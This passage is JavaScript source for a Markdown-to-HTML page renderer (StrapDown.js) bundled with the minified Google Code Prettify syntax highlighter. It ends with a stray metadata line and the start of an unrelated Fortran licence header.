RUBY_KEYWORDS=[FLOW_CONTROL_KEYWORDS,"alias,and,begin,case,class,"+"def,defined,elsif,end,ensure,false,in,module,next,nil,not,or,redo,"+"rescue,retry,self,super,then,true,undef,unless,until,when,yield,"+"BEGIN,END"];var SH_KEYWORDS=[FLOW_CONTROL_KEYWORDS,"case,done,elif,esac,eval,fi,"+"function,in,local,set,then,until"];var ALL_KEYWORDS=[CPP_KEYWORDS,CSHARP_KEYWORDS,JSCRIPT_KEYWORDS,PERL_KEYWORDS+
PYTHON_KEYWORDS,RUBY_KEYWORDS,SH_KEYWORDS];var C_TYPES=/^(DIR|FILE|vector|(de|priority_)?queue|list|stack|(const_)?iterator|(multi)?(set|map)|bitset|u?(int|float)\d*)\b/;var PR_STRING='str';var PR_KEYWORD='kwd';var PR_COMMENT='com';var PR_TYPE='typ';var PR_LITERAL='lit';var PR_PUNCTUATION='pun';var PR_PLAIN='pln';var PR_TAG='tag';var PR_DECLARATION='dec';var PR_SOURCE='src';var PR_ATTRIB_NAME='atn';var PR_ATTRIB_VALUE='atv';var PR_NOCODE='nocode';var REGEXP_PRECEDER_PATTERN='(?:^^\\.?|[+-]|[!=]=?=?|\\#|%=?|&&?=?|\\(|\\*=?|[+\\-]=|->|\\/=?|::?|<<?=?|>>?>?=?|,|;|\\?|@|\\[|~|{|\\^\\^?=?|\\|\\|?=?|break|case|continue|delete|do|else|finally|instanceof|return|throw|try|typeof)\\s*';function combinePrefixPatterns(regexs){var capturedGroupIndex=0;var needToFoldCase=false;var ignoreCase=false;for(var i=0,n=regexs.length;i<n;++i){var regex=regexs[i];if(regex.ignoreCase){ignoreCase=true;}else if(/[a-z]/i.test(regex.source.replace(/\\u[0-9a-f]{4}|\\x[0-9a-f]{2}|\\[^ux]/gi,''))){needToFoldCase=true;ignoreCase=false;break;}}
var escapeCharToCodeUnit={'b':8,'t':9,'n':0xa,'v':0xb,'f':0xc,'r':0xd};function decodeEscape(charsetPart){var cc0=charsetPart.charCodeAt(0);if(cc0!==92){return cc0;}
var c1=charsetPart.charAt(1);cc0=escapeCharToCodeUnit[c1];if(cc0){return cc0;}else if('0'<=c1&&c1<='7'){return parseInt(charsetPart.substring(1),8);}else if(c1==='u'||c1==='x'){return parseInt(charsetPart.substring(2),16);}else{return charsetPart.charCodeAt(1);}}
function encodeEscape(charCode){if(charCode<0x20){return(charCode<0x10?'\\x0':'\\x')+charCode.toString(16);}
var ch=String.fromCharCode(charCode);return(ch==='\\'||ch==='-'||ch===']'||ch==='^')?"\\"+ch:ch;}
function caseFoldCharset(charSet){var charsetParts=charSet.substring(1,charSet.length-1).match(new RegExp('\\\\u[0-9A-Fa-f]{4}'
+'|\\\\x[0-9A-Fa-f]{2}'
+'|\\\\[0-3][0-7]{0,2}'
+'|\\\\[0-7]{1,2}'
+'|\\\\[\\s\\S]'
+'|-'
+'|[^-\\\\]','g'));var ranges=[];var inverse=charsetParts[0]==='^';var out=['['];if(inverse){out.push('^');}
for(var i=inverse?1:0,n=charsetParts.length;i<n;++i){var p=charsetParts[i];if(/\\[bdsw]/i.test(p)){out.push(p);}else{var start=decodeEscape(p);var end;if(i+2<n&&'-'===charsetParts[i+1]){end=decodeEscape(charsetParts[i+2]);i+=2;}else{end=start;}
ranges.push([start,end]);if(!(end<65||start>122)){if(!(end<65||start>90)){ranges.push([Math.max(65,start)|32,Math.min(end,90)|32]);}
if(!(end<97||start>122)){ranges.push([Math.max(97,start)&~32,Math.min(end,122)&~32]);}}}}
ranges.sort(function(a,b){return(a[0]-b[0])||(b[1]-a[1]);});var consolidatedRanges=[];var lastRange=[];for(var i=0;i<ranges.length;++i){var range=ranges[i];if(range[0]<=lastRange[1]+1){lastRange[1]=Math.max(lastRange[1],range[1]);}else{consolidatedRanges.push(lastRange=range);}}
for(var i=0;i<consolidatedRanges.length;++i){var range=consolidatedRanges[i];out.push(encodeEscape(range[0]));if(range[1]>range[0]){if(range[1]+1>range[0]){out.push('-');}
out.push(encodeEscape(range[1]));}}
out.push(']');return out.join('');}
function allowAnywhereFoldCaseAndRenumberGroups(regex){var parts=regex.source.match(new RegExp('(?:'
+'\\[(?:[^\\x5C\\x5D]|\\\\[\\s\\S])*\\]'
+'|\\\\u[A-Fa-f0-9]{4}'
+'|\\\\x[A-Fa-f0-9]{2}'
+'|\\\\[0-9]+'
+'|\\\\[^ux0-9]'
+'|\\(\\?[:!=]'
+'|[\\(\\)\\^]'
+'|[^\\x5B\\x5C\\(\\)\\^]+'
+')','g'));var n=parts.length;var capturedGroups=[];for(var i=0,groupIndex=0;i<n;++i){var p=parts[i];if(p==='('){++groupIndex;}else if('\\'===p.charAt(0)){var decimalValue=+p.substring(1);if(decimalValue){if(decimalValue<=groupIndex){capturedGroups[decimalValue]=-1;}else{parts[i]=encodeEscape(decimalValue);}}}}
for(var i=1;i<capturedGroups.length;++i){if(-1===capturedGroups[i]){capturedGroups[i]=++capturedGroupIndex;}}
for(var i=0,groupIndex=0;i<n;++i){var p=parts[i];if(p==='('){++groupIndex;if(!capturedGroups[groupIndex]){parts[i]='(?:';}}else if('\\'===p.charAt(0)){var decimalValue=+p.substring(1);if(decimalValue&&decimalValue<=groupIndex){parts[i]='\\'+capturedGroups[decimalValue];}}}
for(var i=0;i<n;++i){if('^'===parts[i]&&'^'!==parts[i+1]){parts[i]='';}}
if(regex.ignoreCase&&needToFoldCase){for(var i=0;i<n;++i){var p=parts[i];var ch0=p.charAt(0);if(p.length>=2&&ch0==='['){parts[i]=caseFoldCharset(p);}else if(ch0!=='\\'){parts[i]=p.replace(/[a-zA-Z]/g,function(ch){var cc=ch.charCodeAt(0);return'['+String.fromCharCode(cc&~32,cc|32)+']';});}}}
return parts.join('');}
var rewritten=[];for(var i=0,n=regexs.length;i<n;++i){var regex=regexs[i];if(regex.global||regex.multiline){throw new Error(''+regex);}
rewritten.push('(?:'+allowAnywhereFoldCaseAndRenumberGroups(regex)+')');}
return new RegExp(rewritten.join('|'),ignoreCase?'gi':'g');}
function extractSourceSpans(node,isPreformatted){var nocode=/(?:^|\s)nocode(?:\s|$)/;var chunks=[];var length=0;var spans=[];var k=0;function walk(node){switch(node.nodeType){case 1:if(nocode.test(node.className)){return;}
for(var child=node.firstChild;child;child=child.nextSibling){walk(child);}
var nodeName=node.nodeName.toLowerCase();if('br'===nodeName||'li'===nodeName){chunks[k]='\n';spans[k<<1]=length++;spans[(k++<<1)|1]=node;}
break;case 3:case 4:var text=node.nodeValue;if(text.length){if(!isPreformatted){text=text.replace(/[ \t\r\n]+/g,' ');}else{text=text.replace(/\r\n?/g,'\n');}
chunks[k]=text;spans[k<<1]=length;length+=text.length;spans[(k++<<1)|1]=node;}
break;}}
walk(node);return{sourceCode:chunks.join('').replace(/\n$/,''),spans:spans};}
function appendDecorations(basePos,sourceCode,langHandler,out){if(!sourceCode){return;}
var job={sourceCode:sourceCode,basePos:basePos};langHandler(job);out.push.apply(out,job.decorations);}
var notWs=/\S/;function childContentWrapper(element){var wrapper=undefined;for(var c=element.firstChild;c;c=c.nextSibling){var type=c.nodeType;wrapper=(type===1)?(wrapper?element:c):(type===3)?(notWs.test(c.nodeValue)?element:wrapper):wrapper;}
return wrapper===element?undefined:wrapper;}
function createSimpleLexer(shortcutStylePatterns,fallthroughStylePatterns){var shortcuts={};var tokenizer;(function(){var allPatterns=shortcutStylePatterns.concat(fallthroughStylePatterns);var allRegexs=[];var regexKeys={};for(var i=0,n=allPatterns.length;i<n;++i){var patternParts=allPatterns[i];var shortcutChars=patternParts[3];if(shortcutChars){for(var c=shortcutChars.length;--c>=0;){shortcuts[shortcutChars.charAt(c)]=patternParts;}}
var regex=patternParts[1];var k=''+regex;if(!regexKeys.hasOwnProperty(k)){allRegexs.push(regex);regexKeys[k]=null;}}
allRegexs.push(/[\0-\uffff]/);tokenizer=combinePrefixPatterns(allRegexs);})();var nPatterns=fallthroughStylePatterns.length;var decorate=function(job){var sourceCode=job.sourceCode,basePos=job.basePos;var decorations=[basePos,PR_PLAIN];var pos=0;var tokens=sourceCode.match(tokenizer)||[];var styleCache={};for(var ti=0,nTokens=tokens.length;ti<nTokens;++ti){var token=tokens[ti];var style=styleCache[token];var match=void 0;var isEmbedded;if(typeof style==='string'){isEmbedded=false;}else{var patternParts=shortcuts[token.charAt(0)];if(patternParts){match=token.match(patternParts[1]);style=patternParts[0];}else{for(var i=0;i<nPatterns;++i){patternParts=fallthroughStylePatterns[i];match=token.match(patternParts[1]);if(match){style=patternParts[0];break;}}
if(!match){style=PR_PLAIN;}}
isEmbedded=style.length>=5&&'lang-'===style.substring(0,5);if(isEmbedded&&!(match&&typeof match[1]==='string')){isEmbedded=false;style=PR_SOURCE;}
if(!isEmbedded){styleCache[token]=style;}}
var tokenStart=pos;pos+=token.length;if(!isEmbedded){decorations.push(basePos+tokenStart,style);}else{var embeddedSource=match[1];var embeddedSourceStart=token.indexOf(embeddedSource);var embeddedSourceEnd=embeddedSourceStart+embeddedSource.length;if(match[2]){embeddedSourceEnd=token.length-match[2].length;embeddedSourceStart=embeddedSourceEnd-embeddedSource.length;}
var lang=style.substring(5);appendDecorations(basePos+tokenStart,token.substring(0,embeddedSourceStart),decorate,decorations);appendDecorations(basePos+tokenStart+embeddedSourceStart,embeddedSource,langHandlerForExtension(lang,embeddedSource),decorations);appendDecorations(basePos+tokenStart+embeddedSourceEnd,token.substring(embeddedSourceEnd),decorate,decorations);}}
job.decorations=decorations;};return decorate;}
function sourceDecorator(options){var shortcutStylePatterns=[],fallthroughStylePatterns=[];if(options['tripleQuotedStrings']){shortcutStylePatterns.push([PR_STRING,/^(?:\'\'\'(?:[^\'\\]|\\[\s\S]|\'{1,2}(?=[^\']))*(?:\'\'\'|$)|\"\"\"(?:[^\"\\]|\\[\s\S]|\"{1,2}(?=[^\"]))*(?:\"\"\"|$)|\'(?:[^\\\']|\\[\s\S])*(?:\'|$)|\"(?:[^\\\"]|\\[\s\S])*(?:\"|$))/,null,'\'"']);}else if(options['multiLineStrings']){shortcutStylePatterns.push([PR_STRING,/^(?:\'(?:[^\\\']|\\[\s\S])*(?:\'|$)|\"(?:[^\\\"]|\\[\s\S])*(?:\"|$)|\`(?:[^\\\`]|\\[\s\S])*(?:\`|$))/,null,'\'"`']);}else{shortcutStylePatterns.push([PR_STRING,/^(?:\'(?:[^\\\'\r\n]|\\.)*(?:\'|$)|\"(?:[^\\\"\r\n]|\\.)*(?:\"|$))/,null,'"\'']);}
if(options['verbatimStrings']){fallthroughStylePatterns.push([PR_STRING,/^@\"(?:[^\"]|\"\")*(?:\"|$)/,null]);}
var hc=options['hashComments'];if(hc){if(options['cStyleComments']){if(hc>1){shortcutStylePatterns.push([PR_COMMENT,/^#(?:##(?:[^#]|#(?!##))*(?:###|$)|.*)/,null,'#']);}else{shortcutStylePatterns.push([PR_COMMENT,/^#(?:(?:define|e(?:l|nd)if|else|error|ifn?def|include|line|pragma|undef|warning)\b|[^\r\n]*)/,null,'#']);}
fallthroughStylePatterns.push([PR_STRING,/^<(?:(?:(?:\.\.\/)*|\/?)(?:[\w-]+(?:\/[\w-]+)+)?[\w-]+\.h(?:h|pp|\+\+)?|[a-z]\w*)>/,null]);}else{shortcutStylePatterns.push([PR_COMMENT,/^#[^\r\n]*/,null,'#']);}}
if(options['cStyleComments']){fallthroughStylePatterns.push([PR_COMMENT,/^\/\/[^\r\n]*/,null]);fallthroughStylePatterns.push([PR_COMMENT,/^\/\*[\s\S]*?(?:\*\/|$)/,null]);}
if(options['regexLiterals']){var REGEX_LITERAL=('/(?=[^/*])'
+'(?:[^/\\x5B\\x5C]'
+'|\\x5C[\\s\\S]'
+'|\\x5B(?:[^\\x5C\\x5D]|\\x5C[\\s\\S])*(?:\\x5D|$))+'
+'/');fallthroughStylePatterns.push(['lang-regex',new RegExp('^'+REGEXP_PRECEDER_PATTERN+'('+REGEX_LITERAL+')')]);}
var types=options['types'];if(types){fallthroughStylePatterns.push([PR_TYPE,types]);}
var keywords=(""+options['keywords']).replace(/^ | $/g,'');if(keywords.length){fallthroughStylePatterns.push([PR_KEYWORD,new RegExp('^(?:'+keywords.replace(/[\s,]+/g,'|')+')\\b'),null]);}
shortcutStylePatterns.push([PR_PLAIN,/^\s+/,null,' \r\n\t\xA0']);var punctuation=/^.[^\s\w\.$@\'\"\`\/\\]*/;fallthroughStylePatterns.push([PR_LITERAL,/^@[a-z_$][a-z_$@0-9]*/i,null],[PR_TYPE,/^(?:[@_]?[A-Z]+[a-z][A-Za-z_$@0-9]*|\w+_t\b)/,null],[PR_PLAIN,/^[a-z_$][a-z_$@0-9]*/i,null],[PR_LITERAL,new RegExp('^(?:'
+'0x[a-f0-9]+'
+'|(?:\\d(?:_\\d+)*\\d*(?:\\.\\d*)?|\\.\\d\\+)'
+'(?:e[+\\-]?\\d+)?'
+')'
+'[a-z]*','i'),null,'0123456789'],[PR_PLAIN,/^\\[\s\S]?/,null],[PR_PUNCTUATION,punctuation,null]);return createSimpleLexer(shortcutStylePatterns,fallthroughStylePatterns);}
var decorateSource=sourceDecorator({'keywords':ALL_KEYWORDS,'hashComments':true,'cStyleComments':true,'multiLineStrings':true,'regexLiterals':true});function numberLines(node,opt_startLineNum,isPreformatted){var nocode=/(?:^|\s)nocode(?:\s|$)/;var lineBreak=/\r\n?|\n/;var document=node.ownerDocument;var li=document.createElement('li');while(node.firstChild){li.appendChild(node.firstChild);}
var listItems=[li];function walk(node){switch(node.nodeType){case 1:if(nocode.test(node.className)){break;}
if('br'===node.nodeName){breakAfter(node);if(node.parentNode){node.parentNode.removeChild(node);}}else{for(var child=node.firstChild;child;child=child.nextSibling){walk(child);}}
break;case 3:case 4:if(isPreformatted){var text=node.nodeValue;var match=text.match(lineBreak);if(match){var firstLine=text.substring(0,match.index);node.nodeValue=firstLine;var tail=text.substring(match.index+match[0].length);if(tail){var parent=node.parentNode;parent.insertBefore(document.createTextNode(tail),node.nextSibling);}
breakAfter(node);if(!firstLine){node.parentNode.removeChild(node);}}}
break;}}
function breakAfter(lineEndNode){while(!lineEndNode.nextSibling){lineEndNode=lineEndNode.parentNode;if(!lineEndNode){return;}}
function breakLeftOf(limit,copy){var rightSide=copy?limit.cloneNode(false):limit;var parent=limit.parentNode;if(parent){var parentClone=breakLeftOf(parent,1);var next=limit.nextSibling;parentClone.appendChild(rightSide);for(var sibling=next;sibling;sibling=next){next=sibling.nextSibling;parentClone.appendChild(sibling);}}
return rightSide;}
var copiedListItem=breakLeftOf(lineEndNode.nextSibling,0);for(var parent;(parent=copiedListItem.parentNode)&&parent.nodeType===1;){copiedListItem=parent;}
listItems.push(copiedListItem);}
for(var i=0;i<listItems.length;++i){walk(listItems[i]);}
if(opt_startLineNum===(opt_startLineNum|0)){listItems[0].setAttribute('value',opt_startLineNum);}
var ol=document.createElement('ol');ol.className='linenums';var offset=Math.max(0,((opt_startLineNum-1))|0)||0;for(var i=0,n=listItems.length;i<n;++i){li=listItems[i];li.className='L'+((i+offset)%10);if(!li.firstChild){li.appendChild(document.createTextNode('\xA0'));}
ol.appendChild(li);}
node.appendChild(ol);}
function recombineTagsAndDecorations(job){var isIE8OrEarlier=/\bMSIE\s(\d+)/.exec(navigator.userAgent);isIE8OrEarlier=isIE8OrEarlier&&+isIE8OrEarlier[1]<=8;var newlineRe=/\n/g;var source=job.sourceCode;var sourceLength=source.length;var sourceIndex=0;var spans=job.spans;var nSpans=spans.length;var spanIndex=0;var decorations=job.decorations;var nDecorations=decorations.length;var decorationIndex=0;decorations[nDecorations]=sourceLength;var decPos,i;for(i=decPos=0;i<nDecorations;){if(decorations[i]!==decorations[i+2]){decorations[decPos++]=decorations[i++];decorations[decPos++]=decorations[i++];}else{i+=2;}}
nDecorations=decPos;for(i=decPos=0;i<nDecorations;){var startPos=decorations[i];var startDec=decorations[i+1];var end=i+2;while(end+2<=nDecorations&&decorations[end+1]===startDec){end+=2;}
decorations[decPos++]=startPos;decorations[decPos++]=startDec;i=end;}
nDecorations=decorations.length=decPos;var sourceNode=job.sourceNode;var oldDisplay;if(sourceNode){oldDisplay=sourceNode.style.display;sourceNode.style.display='none';}
try{var decoration=null;while(spanIndex<nSpans){var spanStart=spans[spanIndex];var spanEnd=spans[spanIndex+2]||sourceLength;var decEnd=decorations[decorationIndex+2]||sourceLength;var end=Math.min(spanEnd,decEnd);var textNode=spans[spanIndex+1];var styledText;if(textNode.nodeType!==1&&(styledText=source.substring(sourceIndex,end))){if(isIE8OrEarlier){styledText=styledText.replace(newlineRe,'\r');}
textNode.nodeValue=styledText;var document=textNode.ownerDocument;var span=document.createElement('span');span.className=decorations[decorationIndex+1];var parentNode=textNode.parentNode;parentNode.replaceChild(span,textNode);span.appendChild(textNode);if(sourceIndex<spanEnd){spans[spanIndex+1]=textNode=document.createTextNode(source.substring(end,spanEnd));parentNode.insertBefore(textNode,span.nextSibling);}}
sourceIndex=end;if(sourceIndex>=spanEnd){spanIndex+=2;}
if(sourceIndex>=decEnd){decorationIndex+=2;}}}finally{if(sourceNode){sourceNode.style.display=oldDisplay;}}}
var langHandlerRegistry={};function registerLangHandler(handler,fileExtensions){for(var i=fileExtensions.length;--i>=0;){var ext=fileExtensions[i];if(!langHandlerRegistry.hasOwnProperty(ext)){langHandlerRegistry[ext]=handler;}else if(win['console']){console['warn']('cannot override language handler %s',ext);}}}
function langHandlerForExtension(extension,source){if(!(extension&&langHandlerRegistry.hasOwnProperty(extension))){extension=/^\s*</.test(source)?'default-markup':'default-code';}
return langHandlerRegistry[extension];}
registerLangHandler(decorateSource,['default-code']);registerLangHandler(createSimpleLexer([],[[PR_PLAIN,/^[^<?]+/],[PR_DECLARATION,/^<!\w[^>]*(?:>|$)/],[PR_COMMENT,/^<\!--[\s\S]*?(?:-\->|$)/],['lang-',/^<\?([\s\S]+?)(?:\?>|$)/],['lang-',/^<%([\s\S]+?)(?:%>|$)/],[PR_PUNCTUATION,/^(?:<[%?]|[%?]>)/],['lang-',/^<xmp\b[^>]*>([\s\S]+?)<\/xmp\b[^>]*>/i],['lang-js',/^<script\b[^>]*>([\s\S]*?)(<\/script\b[^>]*>)/i],['lang-css',/^<style\b[^>]*>([\s\S]*?)(<\/style\b[^>]*>)/i],['lang-in.tag',/^(<\/?[a-z][^<>]*>)/i]]),['default-markup','htm','html','mxml','xhtml','xml','xsl']);registerLangHandler(createSimpleLexer([[PR_PLAIN,/^[\s]+/,null,' \t\r\n'],[PR_ATTRIB_VALUE,/^(?:\"[^\"]*\"?|\'[^\']*\'?)/,null,'\"\'']],[[PR_TAG,/^^<\/?[a-z](?:[\w.:-]*\w)?|\/?>$/i],[PR_ATTRIB_NAME,/^(?!style[\s=]|on)[a-z](?:[\w:-]*\w)?/i],['lang-uq.val',/^=\s*([^>\'\"\s]*(?:[^>\'\"\s\/]|\/(?=\s)))/],[PR_PUNCTUATION,/^[=<>\/]+/],['lang-js',/^on\w+\s*=\s*\"([^\"]+)\"/i],['lang-js',/^on\w+\s*=\s*\'([^\']+)\'/i],['lang-js',/^on\w+\s*=\s*([^\"\'>\s]+)/i],['lang-css',/^style\s*=\s*\"([^\"]+)\"/i],['lang-css',/^style\s*=\s*\'([^\']+)\'/i],['lang-css',/^style\s*=\s*([^\"\'>\s]+)/i]]),['in.tag']);registerLangHandler(createSimpleLexer([],[[PR_ATTRIB_VALUE,/^[\s\S]+/]]),['uq.val']);registerLangHandler(sourceDecorator({'keywords':CPP_KEYWORDS,'hashComments':true,'cStyleComments':true,'types':C_TYPES}),['c','cc','cpp','cxx','cyc','m']);registerLangHandler(sourceDecorator({'keywords':'null,true,false'}),['json']);registerLangHandler(sourceDecorator({'keywords':CSHARP_KEYWORDS,'hashComments':true,'cStyleComments':true,'verbatimStrings':true,'types':C_TYPES}),['cs']);registerLangHandler(sourceDecorator({'keywords':JAVA_KEYWORDS,'cStyleComments':true}),['java']);registerLangHandler(sourceDecorator({'keywords':SH_KEYWORDS,'hashComments':true,'multiLineStrings':true}),['bsh','csh','sh']);registerLangHandler(sourceDecorator({'keywords':PYTHON_KEYWORDS,'hashComments':true,'multiLineStrings':true,'tripleQuotedStrings':true}),['cv','py']);registerLangHandler(sourceDecorator({'keywords':PERL_KEYWORDS,'hashComments':true,'multiLineStrings':true,'regexLiterals':true}),['perl','pl','pm']);registerLangHandler(sourceDecorator({'keywords':RUBY_KEYWORDS,'hashComments':true,'multiLineStrings':true,'regexLiterals':true}),['rb']);registerLangHandler(sourceDecorator({'keywords':JSCRIPT_KEYWORDS,'cStyleComments':true,'regexLiterals':true}),['js']);registerLangHandler(sourceDecorator({'keywords':COFFEE_KEYWORDS,'hashComments':3,'cStyleComments':true,'multilineStrings':true,'tripleQuotedStrings':true,'regexLiterals':true}),['coffee']);registerLangHandler(createSimpleLexer([],[[PR_STRING,/^[\s\S]+/]]),['regex']);function applyDecorator(job){var opt_langExtension=job.langExtension;try{var sourceAndSpans=extractSourceSpans(job.sourceNode,job.pre);var source=sourceAndSpans.sourceCode;job.sourceCode=source;job.spans=sourceAndSpans.spans;job.basePos=0;langHandlerForExtension(opt_langExtension,source)(job);recombineTagsAndDecorations(job);}catch(e){if(win['console']){console['log'](e&&e['stack']?e['stack']:e);}}}
function prettyPrintOne(sourceCodeHtml,opt_langExtension,opt_numberLines){var container=document.createElement('pre');container.innerHTML=sourceCodeHtml;if(opt_numberLines){numberLines(container,opt_numberLines,true);}
var job={langExtension:opt_langExtension,numberLines:opt_numberLines,sourceNode:container,pre:1};applyDecorator(job);return container.innerHTML;}
function prettyPrint(opt_whenDone){function byTagName(tn){return document.getElementsByTagName(tn);}
var codeSegments=[byTagName('pre'),byTagName('code'),byTagName('xmp')];var elements=[];for(var i=0;i<codeSegments.length;++i){for(var j=0,n=codeSegments[i].length;j<n;++j){elements.push(codeSegments[i][j]);}}
codeSegments=null;var clock=Date;if(!clock['now']){clock={'now':function(){return+(new Date);}};}
var k=0;var prettyPrintingJob;var langExtensionRe=/\blang(?:uage)?-([\w.]+)(?!\S)/;var prettyPrintRe=/\bprettyprint\b/;var prettyPrintedRe=/\bprettyprinted\b/;var preformattedTagNameRe=/pre|xmp/i;var codeRe=/^code$/i;var preCodeXmpRe=/^(?:pre|code|xmp)$/i;function doWork(){var endTime=(win['PR_SHOULD_USE_CONTINUATION']?clock['now']()+250:Infinity);for(;k<elements.length&&clock['now']()<endTime;k++){var cs=elements[k];var className=cs.className;if(prettyPrintRe.test(className)&&!prettyPrintedRe.test(className)){var nested=false;for(var p=cs.parentNode;p;p=p.parentNode){var tn=p.tagName;if(preCodeXmpRe.test(tn)&&p.className&&prettyPrintRe.test(p.className)){nested=true;break;}}
if(!nested){cs.className+=' prettyprinted';var langExtension=className.match(langExtensionRe);var wrapper;if(!langExtension&&(wrapper=childContentWrapper(cs))&&codeRe.test(wrapper.tagName)){langExtension=wrapper.className.match(langExtensionRe);}
if(langExtension){langExtension=langExtension[1];}
var preformatted;if(preformattedTagNameRe.test(cs.tagName)){preformatted=1;}else{var currentStyle=cs['currentStyle'];var whitespace=(currentStyle?currentStyle['whiteSpace']:(document.defaultView&&document.defaultView.getComputedStyle)?document.defaultView.getComputedStyle(cs,null).getPropertyValue('white-space'):0);preformatted=whitespace&&'pre'===whitespace.substring(0,3);}
var lineNums=cs.className.match(/\blinenums\b(?::(\d+))?/);lineNums=lineNums?lineNums[1]&&lineNums[1].length?+lineNums[1]:true:false;if(lineNums){numberLines(cs,lineNums,preformatted);}
prettyPrintingJob={langExtension:langExtension,sourceNode:cs,numberLines:lineNums,pre:preformatted};applyDecorator(prettyPrintingJob);}}}
if(k<elements.length){setTimeout(doWork,250);}else if(opt_whenDone){opt_whenDone();}}
doWork();}
var PR=win['PR']={'createSimpleLexer':createSimpleLexer,'registerLangHandler':registerLangHandler,'sourceDecorator':sourceDecorator,'PR_ATTRIB_NAME':PR_ATTRIB_NAME,'PR_ATTRIB_VALUE':PR_ATTRIB_VALUE,'PR_COMMENT':PR_COMMENT,'PR_DECLARATION':PR_DECLARATION,'PR_KEYWORD':PR_KEYWORD,'PR_LITERAL':PR_LITERAL,'PR_NOCODE':PR_NOCODE,'PR_PLAIN':PR_PLAIN,'PR_PUNCTUATION':PR_PUNCTUATION,'PR_SOURCE':PR_SOURCE,'PR_STRING':PR_STRING,'PR_TAG':PR_TAG,'PR_TYPE':PR_TYPE,'prettyPrintOne':win['prettyPrintOne']=prettyPrintOne,'prettyPrint':win['prettyPrint']=prettyPrint};if(typeof define==="function"&&define['amd']){define("google-code-prettify",[],function(){return PR;});}})();
;(function(window, document) {
// Hide body until we're done fiddling with the DOM (FIXED)
document.body.style.display = 'none';
//////////////////////////////////////////////////////////////////////
//
// Shims for IE < 9
//
document.head = document.getElementsByTagName('head')[0];
if (!('getElementsByClassName' in document)) {
document.getElementsByClassName = function(name) {
function getElementsByClassName(node, classname) {
var a = [];
var re = new RegExp('(^| )'+classname+'( |$)');
var els = node.getElementsByTagName("*");
for(var i=0,j=els.length; i<j; i++)
if(re.test(els[i].className))a.push(els[i]);
return a;
}
return getElementsByClassName(document.body, name);
}
}
//////////////////////////////////////////////////////////////////////
//
// Get user elements we need
//
var markdownEl = document.getElementsByTagName('xmp')[0] || document.getElementsByTagName('pre')[0] || document.getElementsByTagName('textarea')[0],
titleEl = document.getElementsByTagName('title')[0],
scriptEls = document.getElementsByTagName('script'),
navbarEl = document.getElementsByClassName('navbar')[0];
//////////////////////////////////////////////////////////////////////
//
// <head> stuff
//
// Use <meta> viewport so that Bootstrap is actually responsive on mobile
var metaEl = document.createElement('meta');
metaEl.name = 'viewport';
metaEl.content = 'width=device-width, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0';
if (document.head.firstChild)
document.head.insertBefore(metaEl, document.head.firstChild);
else
document.head.appendChild(metaEl);
// Get origin of script
var origin = '';
for (var i = 0; i < scriptEls.length; i++) {
if (scriptEls[i].src.match('strapdown')) {
origin = scriptEls[i].src;
}
}
var originBase = origin.substr(0, origin.lastIndexOf('/'));
// Get theme
var theme = markdownEl.getAttribute('theme') || 'bootstrap';
theme = theme.toLowerCase();
// Stylesheets
var linkEl = document.createElement('link');
linkEl.rel = 'stylesheet';
linkEl.href = originBase + '/themes/'+theme+'.min.css?md';
document.head.appendChild(linkEl);
var linkEl = document.createElement('link');
linkEl.rel = 'stylesheet';
linkEl.href = originBase + '/strapdown.css?md';
document.head.appendChild(linkEl);
var linkEl = document.createElement('link');
linkEl.rel = 'stylesheet';
linkEl.href = originBase + '/themes/bootstrap-responsive.min.css?md';
document.head.appendChild(linkEl);
// Favicon
var linkEl = document.createElement('link');
linkEl.rel = 'shortcut icon';
linkEl.href = originBase + '/favicon.png?md';
// linkEl.href = 'https://ga-beacon.appspot.com/UA-38514290-15/strapdown?pixel';
document.head.appendChild(linkEl);
//////////////////////////////////////////////////////////////////////
//
// <body> stuff
//
var markdown = markdownEl.textContent || markdownEl.innerText;
var newNode = document.createElement('div');
newNode.className = 'container';
newNode.id = 'content';
document.body.replaceChild(newNode, markdownEl);
// Insert navbar if there's none
// FIXME be sure THIS is good.
var newNode = document.createElement('div');
newNode.className = 'navbar navbar-fixed-top';
if (!navbarEl && titleEl) {
newNode.innerHTML = '<div class="navbar-inner"> <div class="container"> <div id="headline" class="brand"> </div> '
/* // @HARDLY: dont want
+ '<div id="headline-copyrights" class="brand">(Powered by '
+ '<a title="http://lbo.k.vu/md" href="https://lbesson.bitbucket.org/md/index.html?src=strapdown.js">StrapDown.js</a> v0.4.1 '
+ 'with theme <a title="More information on this theme on bootswatch.com !" href="http://bootswatch.com/'+theme+'">'+theme+'</a>, '
+ 'hosted on <a href="https://bitbucket.org/">BitBucket</a>)</div> '
+ '<div id="headline-squirt" class="brand"> <a title="Check https://lbesson.bitbucket.org/squirt/ for more informations" '
+ 'href="javascript:(function(){sq=window.sq;if(sq&&sq.closed){window.sq.closed&&window.document.dispatchEvent(new Event(\'squirt.again\'));}else{sq=window.sq||{};sq.version=\'0.4\';sq.host=\'https://lbesson.bitbucket.org/squirt\';sq.j=document.createElement(\'script\');sq.j.src=sq.host+\'/squirt.js?src=strapdown.js\';document.body.appendChild(sq.j);}})();" '
+ '>Use Squirt?</a></div> '
*/
+ '</div> </div>';
document.body.insertBefore(newNode, document.body.firstChild);
var title = titleEl.innerHTML;
var headlineEl = document.getElementById('headline');
if (headlineEl)
headlineEl.innerHTML = title;
}
//////////////////////////////////////////////////////////////////////
//
// Markdown!
//
// Generate Markdown
var html = marked(markdown);
document.getElementById('content').innerHTML = html;
// Prettify
var codeEls = document.getElementsByTagName('code');
for (var i=0, ii=codeEls.length; i<ii; i++) {
var codeEl = codeEls[i];
var lang = codeEl.className;
codeEl.className = 'prettyprint lang-' + lang;
}
prettyPrint();
// Style tables
var tableEls = document.getElementsByTagName('table');
for (var i=0, ii=tableEls.length; i<ii; i++) {
var tableEl = tableEls[i];
tableEl.className = 'table table-striped table-bordered';
}
// All done - show body
document.body.style.display = '';
/* // @HARDLY: dont want
// Experimental ga-beacon auto web request
var linkEl = document.createElement('img');
linkEl.alt = 'GA|Analytics';
linkEl.style = 'visibility: hidden; display: none;';
linkEl.src = 'https://ga-beacon.appspot.com/UA-38514290-14/strapdown.js?pixel';
document.body.appendChild(linkEl);
*/
})(window, document);
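// Usage sketch (hypothetical host page): StrapDown looks for the first <xmp>,
// <pre> or <textarea> element, reads its optional theme="..." attribute, and
// replaces it with the rendered Markdown, e.g.
//
//   <xmp theme="bootstrap"># Title
//   Some *markdown* text.</xmp>
//   <script src="strapdown.js"></script>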
| {
"pile_set_name": "Github"
} |
!**********************************************************************************************************************************
! LICENSING
! Copyright (C) 2014 DNV KEMA Renewables, Inc.
!
! This file is part of the IceFloe suite of subroutines
!
